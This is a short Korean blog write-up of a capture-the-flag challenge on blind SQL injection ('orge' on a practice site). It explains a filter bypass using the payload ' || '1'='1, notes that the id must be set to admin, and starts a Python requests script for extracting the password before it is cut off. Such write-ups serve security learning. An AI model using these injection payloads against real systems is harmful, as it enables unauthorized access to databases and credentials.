Blind sql
-
LOS - 7 (orge) Write Up (blind sql injection)CTF/Web 2020. 3. 15. 20:32
앞에서 or 과 and가 필터링이 되었으며 밑에서 ($result['pw'] == $_GET['pw']) 로직이 구현되어 있어서 pw를 통한 우회가 불가능하다. 그래서 blind sql이 되는지 확인 후 blind sql을 진행하였다. ?pw=' || '1'='1 을 쿼리로 입력하면 라고 뜬다. 여기서 중요한 점은 id가 'geust'로 고정이 되어있음으로 id='admin'을 추가해 주어야한다. import requests url = "https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php?" headers = {"cookie":"PHPSESSID=1231312312"} l = 0 for i in range(1,15): query = ..